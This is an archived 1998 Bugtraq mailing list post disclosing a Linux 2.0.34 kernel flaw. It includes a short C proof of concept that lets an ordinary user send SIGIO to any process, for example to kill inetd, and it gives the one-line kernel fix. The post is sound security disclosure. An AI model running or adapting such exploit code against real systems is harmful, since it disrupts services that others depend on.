Home page logo
/

bugtraq logo Bugtraq mailing list archives

Serious Linux 2.0.34 security problem
From: luyer () UCS UWA EDU AU (David Luyer)
Date: Tue, 30 Jun 1998 15:10:47 +0800


I just saw this mentioned on linux-kernel and confirmed it;

#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
  int s, p;

  if(argc != 2) {
    fputs("Please specify a pid to send signal to.\n", stderr);
    exit(0);
  } else {
    p = atoi(argv[1]);
  }
  fcntl(0,F_SETOWN,p);
  s = fcntl(0,F_GETFL,0);
  fcntl(0,F_SETFL,s|O_ASYNC);
  printf("Sending SIGIO - press enter.\n");
  getchar();
  fcntl(0,F_SETFL,s&~O_ASYNC);
  printf("SIGIO send attempted.\n");
  return 0;
}

This can kill from a normal user account the inetd process under Linux
2.0.34 by sending a SIGIO.  Very bad.

The fix is to invert !euid to euid in fs/fcntl.c:send_sigio(); line number
is approximately 139.

David.



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]